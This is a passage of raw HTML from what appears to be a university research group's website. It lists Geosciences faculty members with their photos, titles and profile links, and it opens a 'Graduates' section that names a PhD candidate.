23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1634 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c67\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c67 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c140\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c140 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c141-outer\">\n            <div data-colibri-id=\"182-c141\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c141 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-862 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c68\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c68 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-854 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\" class=\"wp-image-1659 style-854-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div 